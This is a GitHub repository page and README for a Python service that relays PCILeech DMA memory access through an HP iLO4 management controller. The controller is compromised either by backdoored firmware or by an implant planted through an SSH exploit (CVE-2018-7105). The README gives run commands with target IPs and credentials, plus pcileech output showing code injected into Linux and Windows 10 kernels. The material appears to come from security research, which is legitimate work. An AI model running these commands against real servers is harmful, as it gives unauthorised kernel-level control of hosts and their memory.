PCILeech HP iLO4 Service
Clone or download
F4b
F4b Fix typo
Latest commit 1ef82d8 Jan 9, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Add a new module using @IooNag SSH implant Jan 9, 2019
mod_backdoor.py Fix typo Jan 9, 2019
mod_ssh_exploit.py Add a new module using @IooNag SSH implant Jan 9, 2019
run.py Add a new module using @IooNag SSH implant Jan 9, 2019

README.md

PCILeech HP iLO4 Service

This is a Python service relaying read and write queries from PCILeech to an HP iLO4 device flashed with a modified firmware.

Usage

$ python run.py -h
usage: run.py [-h] [-m MODULE] [-u USER] [-p PASSWORD] [-P PORT] [-v]
              remote_addr

HP iLO4 PCILeech service

positional arguments:
  remote_addr           IP address of the target iLO4 interface

optional arguments:
  -h, --help            show this help message and exit
  -m MODULE, --module MODULE
                        Module to use (backdoor, ssh_exploit)
  -u USER, --user USER  user name
  -p PASSWORD, --password PASSWORD
                        SSH password
  -P PORT, --port PORT  SSH port
  -v, --verbose         verbosity

Modules

backdoor

This modules uses the modified firmware developped as a demonstration for the SSTIC presentation.

Tools to build and flash this firmware are available on the ilo4_toolbox repository.

/pcileech_hpilo4_service$ python run.py -m backdoor 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd LINUX_X64_48 

 Current Action: Scanning for Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       748 / 268435422 (0%)
 Speed:          6 MB/s
 Address:        0x000000002FA00000
 Pages read:     191488 / 68719468032 (0%)
 Pages failed:   0 (0%)

 Current Action: Verifying Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       32 / 32 (100%)
 Speed:          1 MB/s
 Address:        0x0000000031A00000
 Pages read:     8192 / 8192 (100%)
 Pages failed:   0 (0%)
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x76680000

real    2m38.038s

ssh_exploit

This modules uses the in-memory implant installed by the SSH service exploit (CVE-2018-7105) written by IooNag.

The exploit is available on the ilo4_toolbox repository and should be run before using this service.

Dumping large amounts of memory using this modules is not recommended. Therefore, don't use it for a Linux system since dumping 16MB of kernel memory is required.

/pcileech_hpilo4_service$ python run.py -v -m ssh_exploit -u admin -p password 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd WIN10_X64

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffe000

real	1m0.826s
user	0m0.000s
sys	0m0.010s